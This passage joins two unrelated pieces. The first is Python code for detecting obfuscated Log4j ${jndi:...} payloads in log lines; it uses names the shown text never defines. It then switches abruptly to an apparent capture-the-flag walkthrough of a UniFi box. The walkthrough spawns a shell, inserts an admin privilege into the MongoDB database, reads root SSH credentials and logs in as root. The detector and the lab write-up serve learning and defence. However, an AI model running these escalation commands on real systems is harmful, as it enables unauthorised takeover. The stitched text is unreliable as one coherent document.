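DEFAULT_LOOKUP = re.compile(r'\$\{[^${}]*:-([^${}]*)\}')
# What we actually look for once the disguise is peeled off: ${jndi:<scheme>:...}
JNDI_LOOKUP = re.compile(r'\$\{\s*jndi\s*:\s*([a-z0-9+.-]+)\s*:', re.IGNORECASE)


def _case_sub(m):
    text = m.group(2)
    return text.lower() if m.group(1).lower() == 'lower' else text.upper()


def find_jndi(text, max_rounds=10):
    """Return (scheme, normalised_text) if a JNDI lookup is present, else None.

    Innermost ${lower:..}/${upper:..}/${..:-default} lookups are resolved from the
    inside out, one layer per round (the order in which Log4j 2 evaluates them), and
    the text is checked for ${jndi:...} after every round, so a payload is caught at
    whatever nesting depth it first becomes visible.
    """
    for _ in range(max_rounds):
        m = JNDI_LOOKUP.search(text)
        if m:
            return m.group(1).lower(), text
        new = CASE_LOOKUP.sub(_case_sub, text)
        new = DEFAULT_LOOKUP.sub(lambda d: d.group(1), new)
        if new == text:      # nothing left to resolve and still no ${jndi:...}
            return None
        text = new
    return None


def scan_lines(lines):
    """Scan log lines; return a list of (line_number, scheme, normalised_line) hits."""
    hits = []
    for n, line in enumerate(lines, start=1):
        found = find_jndi(line)
        if found:
            hits.append((n, found[0], found[1]))
    return hits


if __name__ == '__main__':
    for n, scheme, norm in scan_lines(SAMPLE_LOG_LINES):
        print(f"line {n}: JNDI lookup via {scheme}: {norm}")
```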
Let's upgrade the shell:
```
script /dev/null -c bash
Script started, file is /dev/null
unifi@unified:/usr/lib/unifi$
```
```
# list all sites
$ mongo --port 27117 ace --eval "db.site.find().forEach(printjson);"

# add privileges for the super site to the user
mongo --port 27117 ace --eval 'db.privilege.insert({ "admin_id" : "62645da6b823b963d1c94d62", "permissions" : [ ], "role" : "admin", "site_id" : "61ce269d46e0fb0012d47ec4" });'
```
Now we can log into the UniFi interface as either administrator / noraj or noraj / noraj, both of which are administrators.
SSH credentials can then be taken from the settings page: root / NotACrackablePassword4U2022.
Alternatively we could have added an SSH key.
Then we just have to connect over SSH.
```
$ ssh root@10.129.96.149
root@unified:~# id
uid=0(root) gid=0(root) groups=0(root)
root@unified:~# cat root.txt
edited
```